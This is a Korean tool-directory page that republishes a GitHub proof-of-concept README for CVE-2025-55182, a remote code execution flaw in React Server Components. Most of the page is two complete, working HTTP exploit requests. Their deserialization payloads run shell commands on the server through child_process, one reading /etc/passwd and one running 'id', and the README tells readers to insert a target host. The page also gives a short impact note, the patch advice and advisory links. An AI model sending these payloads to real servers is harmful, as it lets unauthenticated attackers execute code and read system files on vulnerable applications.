Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
React2Shell_Rce-cve-2025-55182 — React Server Components 버전 19.0.0, 19.1.0, 19.1.1, 및 19.2.0 (react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack 포함)에는 원격 코드 실행 취약점이 존재합니다. | Kitploit
도구/GitHubGitHub/muhammadwaseem29/react2shell_rce-cve-2025-55182
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubmuhammadwaseem29/react2shell_rce-cve-2025-55182

React2Shell_Rce-cve-2025-55182

React Server Components 버전 19.0.0, 19.1.0, 19.1.1, 및 19.2.0 (react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack 포함)에는 원격 코드 실행 취약점이 존재합니다.

저장소 보기웹사이트
3229개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

React 서버 컴포넌트 RCE – README

안녕하세요, 여러분의 화면 쪽도 모두 멋지길 진심으로 바랍니다! 😊✨

설명

React Server Components 버전 19.0.0, 19.1.0, 19.1.1, 19.2.0 (여기에는 react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack이 포함됩니다)은 원격 코드 실행 취약점을 포함합니다.

이 문제는 서버 함수 엔드포인트로 전송된 공격자 제어 페이로드의 안전하지 않은 역직렬화에 의해 트리거됩니다.


PoC – 전체 요청 (정리됨)

아래는 취약점을 보여주는 전체 HTTP 요청으로, 민감한 명령어는 안전을 위해 플레이스홀더로 대체되었습니다. redacted.com을 대상 호스트로 바꾸세요.

root@kitploit:~
POST / HTTP/1.1
Host: redacted.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
스크린샷 2025-12-06 11:49:57 PM

id 명령

root@kitploit:~
POST / HTTP/1.1
Host: redecated.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
스크린샷 2025-12-06 11:55:21 PM

PoC 요약:

  • 서버는 multipart 요청에서 구조화된 페이로드를 역직렬화합니다.
  • 안전하지 않은 역직렬화로 인해 공격자가 실행 흐름에 영향을 줄 수 있습니다.
  • 민감한 명령어는 안전을 위해 플레이스홀더로 대체되었습니다.

영향

인증되지 않은 공격자가 원격으로 임의 코드를 실행할 수 있으며, 잠재적으로 전체 시스템 장악으로 이어질 수 있습니다.


해결 방안

안전하지 않은 역직렬화 경로가 패치된 최신 React Server Components 릴리스로 업데이트하세요.


참고 자료

  • https://github.com/assetnote/react2shell-scanner
  • https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
  • https://www.facebook.com/security/advisories/cve-2025-55182
  • http://www.openwall.com/lists/oss-security/2025/12/03/4
  • https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp
  • https://vercel.com/changelog/cve-2025-55182

여러분의 화면 쪽도 평안하시길 바랍니다 :) ✨❤️

도구 다운로드